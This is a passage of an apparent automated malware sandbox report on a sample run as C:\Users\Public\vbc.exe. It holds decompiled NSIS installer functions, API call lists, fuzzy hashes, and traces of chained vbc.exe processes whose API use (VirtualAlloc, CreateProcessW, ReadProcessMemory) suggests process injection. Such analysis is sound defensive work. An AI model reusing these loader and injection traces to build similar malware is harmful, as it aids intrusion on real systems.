				E004042F8(0x413);
				return 0;
			}

0x004052c7
0x004052d1
0x004052ed
0x0040530f
0x00405312
0x00405318
0x00405322
0x00405323
0x00405325
0x0040532b
0x0040532b
0x00405335
0x00000000
0x00405343
0x004052fa
0x00405332
0x00405332
0x00000000
0x00405332
0x00405306
0x00405308
0x00000000
0x00405308
0x004052d7
0x00000000
0x00000000
0x004052de
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 004052F2
CallWindowProcA.USER32(?,?,?,?), ref: 00405343

Part of subcall function 004042F8: SendMessageA.USER32 ref: 0040430A

Strings

, xrefs: 004052D3

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 267171b98df2b592aa392984fc350499d3aadededac15f67a9f8d07fb1712162
Instruction ID: 59df81840e01a834e8184741018ea8653580e9c1f0e113f815542439c818a584
Opcode Fuzzy Hash: 267171b98df2b592aa392984fc350499d3aadededac15f67a9f8d07fb1712162
Instruction Fuzzy Hash: 61017C71200608AFDF209F51DD81AAB3B66EB94394F50453BFA04761D1C7BA9C929F2D

Uniqueness

Uniqueness Score: -1.00%

Function 00405CAE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405CAE(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00406228(0x422158, _a4);
				_t21 = E00405C59(0x422158);
				if(_t21 != 0) {
					E00406503(_t21);
					if(( *0x42475c & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x422158;
						while(1) {
							_t11 = lstrlenA(0x422158);
							_push(0x422158);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E0040659C();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405C07(0x422158);
								continue;
							} else {
								goto L1;
							}
						}
						E00405BC0();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405cba
0x00405cc5
0x00405cc9
0x00405cd0
0x00405cdc
0x00405ce8
0x00405ce8
0x00405d00
0x00405d01
0x00405d08
0x00405d09
0x00000000
0x00000000
0x00405cec
0x00405cf3
0x00405cfb
0x00000000
0x00000000
0x00000000
0x00000000
0x00405cf3
0x00405d0b
0x00000000
0x00405d1f
0x00405cde
0x00405ce2
0x00000000
0x00000000
0x00000000
0x00000000
0x00405ce2
0x00405ccb
0x00000000

APIs

Part of subcall function 00406228: lstrcpynA.KERNEL32(?,?,00000400,00403533,00423F40,NSIS Error,?,00000007,00000009,0000000B), ref: 00406235

Part of subcall function 00405C59: CharNextA.USER32(?), ref: 00405C67
Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C6C
Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C80

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,76712754,?,766F13E0,00405A10,?,76712754,766F13E0,00000000), ref: 00405D01
GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,76712754,?,766F13E0,00405A10,?,76712754,766F13E0), ref: 00405D11

Strings

C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp, xrefs: 00405CB4, 00405CB9, 00405CBF, 00405CFA, 00405D00, 00405D08, 00405D10

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp
API String ID: 3248276644-2717606532
Opcode ID: 8df147695d567d3479fd9fb611e01f2e4261d231372b324086cf0464a71b3f28
Instruction ID: 810c58eff44cea92ea74d6fc536401bd0fed09a955b2fb282e84a1b8880da462
Opcode Fuzzy Hash: 8df147695d567d3479fd9fb611e01f2e4261d231372b324086cf0464a71b3f28
Instruction Fuzzy Hash: 31F0F921109F5125E62232761D09B9F1E54CD97324745457FF8A1B23D2CB3C8853DD6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040610F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040610F(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E004060AE(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x0040611d
0x0040611f
0x00406137
0x0040613c
0x00406141
0x0040617e
0x0040617e
0x00406143
0x00406155
0x00406160
0x00406166
0x00406170
0x00000000
0x00000000
0x00406170
0x00406183

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,uvlcopdlxoed,00420530,?,?,?,00000002,uvlcopdlxoed,?,004063C4,80000002), ref: 00406155
RegCloseKey.ADVAPI32(?,?,004063C4,80000002,Software\Microsoft\Windows\CurrentVersion,uvlcopdlxoed,uvlcopdlxoed,uvlcopdlxoed,?,00420530), ref: 00406160

Strings

uvlcopdlxoed, xrefs: 00406112, 00406146

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseQueryValue
String ID: uvlcopdlxoed
API String ID: 3356406503-3939465813
Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
Instruction ID: a564c047acf5d73f9aa125f5b2549426a44a408a2c37113ac8a3848fd8f43ee5
Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
Instruction Fuzzy Hash: 8B015A72500209BBDF228F61CC0AFDB3BA8EF55364F01403AF95AA6191D678D964DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004058C7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004058C7(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422558->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x422558,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x004058d0
0x004058f0
0x004058f8
0x004058fd
0x00000000
0x00405903
0x00405907

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422558,Error launching installer), ref: 004058F0
CloseHandle.KERNEL32(?), ref: 004058FD

Strings

Error launching installer, xrefs: 004058DA

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: c3ebc3f9998ac015d8c7df4fd8e4914833f251e822556357c2f70f84276a4d27
Instruction ID: 5185fe82c3568d3c8632712b5ff5a6750f12376067ae41ef0f6fc1d41a32777d
Opcode Fuzzy Hash: c3ebc3f9998ac015d8c7df4fd8e4914833f251e822556357c2f70f84276a4d27
Instruction Fuzzy Hash: D6E0BFF4A00209BFEB109F64ED09F7B77ACEB04644F508425BE51F2150D77899658A78

Uniqueness

Uniqueness Score: -1.00%

Function 00405C07, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C07(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x00405c08
0x00405c12
0x00405c14
0x00405c1b
0x00405c23
0x00000000
0x00000000
0x00000000
0x00405c23
0x00405c25
0x00405c2a

APIs

lstrlenA.KERNEL32(80000000,C:\Users\Public,00402F5D,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405C0D
CharPrevA.USER32(80000000,00000000), ref: 00405C1B

Strings

C:\Users\Public, xrefs: 00405C07

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\Public
API String ID: 2709904686-2272764151
Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
Instruction ID: 741041d8a9fca0cd730fa631f59021aaf6e5318b071c559ffeb457c432b97b3b
Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
Instruction Fuzzy Hash: 09D0C77241DA706EF70363149D05B9F6A48DF57700F1A44A6E581A6191C77C4C524BFD

Uniqueness

Uniqueness Score: -1.00%

Function 00405D26, Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D26(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405d36
0x00405d38
0x00405d3b
0x00405d67
0x00405d40
0x00405d49
0x00405d4e
0x00405d59
0x00405d5c
0x00405d78
0x00405d5e
0x00405d65
0x00000000
0x00405d65
0x00405d71
0x00405d75
0x00405d75
0x00405d6f
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D36
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
CharNextA.USER32(00000000), ref: 00405D5F
lstrlenA.KERNEL32(00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D68

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
Instruction ID: 00b114ba7cac9785f06d25343f2ff2c8ce87c9cf7580b170eb884579fc1bcc0a
Opcode Fuzzy Hash: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
Instruction Fuzzy Hash: 45F0F631100818BFCB02DFA4CD04D9EBBA8EF55354B2580BBE840FB210D634DE01AFA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 2868 Parent PID: 2780 vbc.exeCOMMON

Executed Functions

Function 020413F0, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 356memoryfileCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 02041739
CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0204179B

Strings

5cd4190b0f424c1ba550357b44f5a494, xrefs: 02041808, 0204180B

Memory Dump Source

Source File: 00000006.00000002.2176024110.0000000002040000.00000040.00000001.sdmp, Offset: 02040000, based on PE: false

Similarity

API ID: AllocCreateFileVirtual
String ID: 5cd4190b0f424c1ba550357b44f5a494
API String ID: 1475775534-4174767169
Opcode ID: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction ID: fca1d590217380f8f41ef5eb9e29fae17562ef16dc6a2374c4d18a2e3adc64ac
Opcode Fuzzy Hash: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction Fuzzy Hash: 23E14A71D54388EDEB21CBE4DC15BEDBBB6AF04710F10809AE648FA1D1D7B50A84EB16

Uniqueness

Uniqueness Score: -1.00%

Function 0204091E, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02040A20
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 02040BED

Memory Dump Source

Source File: 00000006.00000002.2176024110.0000000002040000.00000040.00000001.sdmp, Offset: 02040000, based on PE: false

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction ID: aeb57e3379fbeee368cc81b35d3644e0ee7eb5a8a355aee0fcdc5f3019fa82eb
Opcode Fuzzy Hash: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction Fuzzy Hash: 98A104B0D00209EFDF15CFE4C945BEDBBB2AF08315F20846AE615BA290DB755A90EF54

Uniqueness

Uniqueness Score: -1.00%

Function 02040034, Relevance: 5.2, APIs: 3, Instructions: 712processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 0204058C
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 020405D3
TerminateProcess.KERNEL32(00000000,00000000,?), ref: 020408ED

Memory Dump Source

Source File: 00000006.00000002.2176024110.0000000002040000.00000040.00000001.sdmp, Offset: 02040000, based on PE: false

Similarity

API ID: Process$CreateMemoryReadTerminate
String ID:
API String ID: 2831168122-0
Opcode ID: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
Instruction ID: 87f23b2ea504b63dea5a7e928141831a7711b69bcd827c44aad53bf8f21ddac2
Opcode Fuzzy Hash: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
Instruction Fuzzy Hash: 52523C75E50358AEEB64CB94EC55BFDB7B1AF48700F10849AE608FA2A0D7705E80EF45

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: vbc.exe PID: 2804 Parent PID: 2868 vbc.exeCOMMON

Executed Functions

Function 01E413F0, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 356memoryfileCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 01E41739
CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01E4179B

Strings

5cd4190b0f424c1ba550357b44f5a494, xrefs: 01E41808, 01E4180B

Memory Dump Source

Source File: 00000008.00000002.2190237575.0000000001E40000.00000040.00000001.sdmp, Offset: 01E40000, based on PE: false

Similarity

API ID: AllocCreateFileVirtual
String ID: 5cd4190b0f424c1ba550357b44f5a494
API String ID: 1475775534-4174767169
Opcode ID: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction ID: e216dc9f8afb23e2a2f3890e81e40fc568f0e13655ed2151eaf2ca3bfc8f5b03
Opcode Fuzzy Hash: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction Fuzzy Hash: 9AE15921D44388EEEF21CBE4EC15BEDBBB5AF04B00F10509AE648FA1D1D7B11A84DB16

Uniqueness

Uniqueness Score: -1.00%

Function 01E4091E, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 01E40A20
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 01E40BED

Memory Dump Source

Source File: 00000008.00000002.2190237575.0000000001E40000.00000040.00000001.sdmp, Offset: 01E40000, based on PE: false

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction ID: 66851e2bf9c19c2a5fe5540fd91607ec93ea5fec66828fbf9b061c436cb76362
Opcode Fuzzy Hash: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction Fuzzy Hash: 37A10235D00209EFDF11CFE4E985BEDBBB1BF08319F20956AE615BA2A0D3745A80DB14

Uniqueness

Uniqueness Score: -1.00%

Function 01E40034, Relevance: 5.2, APIs: 3, Instructions: 712processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 01E4058C
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01E405D3
TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 01E408ED

Memory Dump Source

Source File: 00000008.00000002.2190237575.0000000001E40000.00000040.00000001.sdmp, Offset: 01E40000, based on PE: false

Similarity

API ID: Process$CreateMemoryReadTerminate
String ID:
API String ID: 2831168122-0
Opcode ID: a5794989a2d6d102f833e7dcfb1e692e285d864809b5cc7d8936d7993d06b28e
Instruction ID: a9d2e4a17189c785948688d0413ae35a8767c802c45b6656c66e02dc9d70840f
Opcode Fuzzy Hash: a5794989a2d6d102f833e7dcfb1e692e285d864809b5cc7d8936d7993d06b28e
Instruction Fuzzy Hash: 07523B35E50258EEEB60CBA8ED55BFDB7B5AF48700F205496E608FA2A0D3705E80DF45

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: vbc.exe PID: 2388 Parent PID: 2804 vbc.exeCOMMON

Executed Functions

Function 005813F0, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 356memoryfileCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 00581739
CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0058179B

Strings

5cd4190b0f424c1ba550357b44f5a494, xrefs: 00581808, 0058180B

Memory Dump Source

Source File: 0000000A.00000002.2201211568.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false

Similarity

API ID: AllocCreateFileVirtual
String ID: 5cd4190b0f424c1ba550357b44f5a494
API String ID: 1475775534-4174767169
Opcode ID: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction ID: 87e9637b45a403ecd94b27f7eb38269f626c8d2b264ed068c91a30358f09e916
Opcode Fuzzy Hash: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction Fuzzy Hash: 0AE15B21E44388EDEF21DBE4DC16BEDBBB5AF04710F10409AE648FA1D1D7B10A85DB1A

Uniqueness

Uniqueness Score: -1.00%

Function 0058091E, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 00580A20
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 00580BED

Memory Dump Source

Source File: 0000000A.00000002.2201211568.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction ID: 74c8dc206743834d064a469e8b11607ab58004a3be69946e6c946ec260ff5da6
Opcode Fuzzy Hash: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction Fuzzy Hash: 6BA1F130D00209EFDF50EFE4C989BADBBB1BF08316F20945AE915BA2A0D7755A85DB14

Uniqueness

Uniqueness Score: -1.00%

Function 00580034, Relevance: 5.2, APIs: 3, Instructions: 712processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 0058058C
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 005805D3
TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 005808ED

Memory Dump Source

Source File: 0000000A.00000002.2201211568.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false

Similarity

API ID: Process$CreateMemoryReadTerminate
String ID:
API String ID: 2831168122-0
Opcode ID: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
Instruction ID: 4942563257b3b0f27f159b11ec7052a02bdecbc422689a9255af86412bc56de9
Opcode Fuzzy Hash: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
Instruction Fuzzy Hash: 29521835A50258AEEB60DB94EC55BFDBBB4BF48700F205496EA08FA2E0D3705E84DF45

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: vbc.exe PID: 1620 Parent PID: 2388 vbc.exeCOMMON

Executed Functions

Function 004313F0, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 356memoryfileCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 00431739
CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0043179B

Strings

5cd4190b0f424c1ba550357b44f5a494, xrefs: 00431808, 0043180B

Memory Dump Source

Source File: 0000000C.00000002.2216292264.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: AllocCreateFileVirtual
String ID: 5cd4190b0f424c1ba550357b44f5a494
API String ID: 1475775534-4174767169
Opcode ID: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction ID: 2fb7317618ca62271da53b771e16b1af27a675a5e0a7b0044d91730c422f3827
Opcode Fuzzy Hash: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction Fuzzy Hash: 33E16F20D44388EDEF21DBE4DC16BEDBBB5AF08714F10509AE648FA1E1D7B50A84DB19

Uniqueness

Uniqueness Score: -1.00%

Function 0043091E, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 00430A20
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 00430BED

Memory Dump Source

Source File: 0000000C.00000002.2216292264.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction ID: 7c7dafa2befd4de379dd934a6a8f9eb1dd0293695ed858227d0316826f94d13b
Opcode Fuzzy Hash: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction Fuzzy Hash: E4A10170D00209EFDF10DFE4D895BADFBB1AF08315F20955AE515BA2A0D3789A41DF19

Uniqueness

Uniqueness Score: -1.00%

Function 00430034, Relevance: 5.2, APIs: 3, Instructions: 712processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 0043058C
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 004305D3
TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 004308ED

Memory Dump Source

Source File: 0000000C.00000002.2216292264.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: Process$CreateMemoryReadTerminate
String ID:
API String ID: 2831168122-0
Opcode ID: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
Instruction ID: badc0c7138c6de790abd3abee7eb1e5aeeb9a9fca14e621c565508c0a416f454
Opcode Fuzzy Hash: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
Instruction Fuzzy Hash: E9523C35E50258EEEB64CB94EC55BFDB7B4AF48700F20559AE608FA2A0D3745E80DF09

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: vbc.exe PID: 2272 Parent PID: 1620 vbc.exeCOMMON

Executed Functions

Function 027413F0, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 356memoryfileCOMMON

Download Yara Rule

APIs

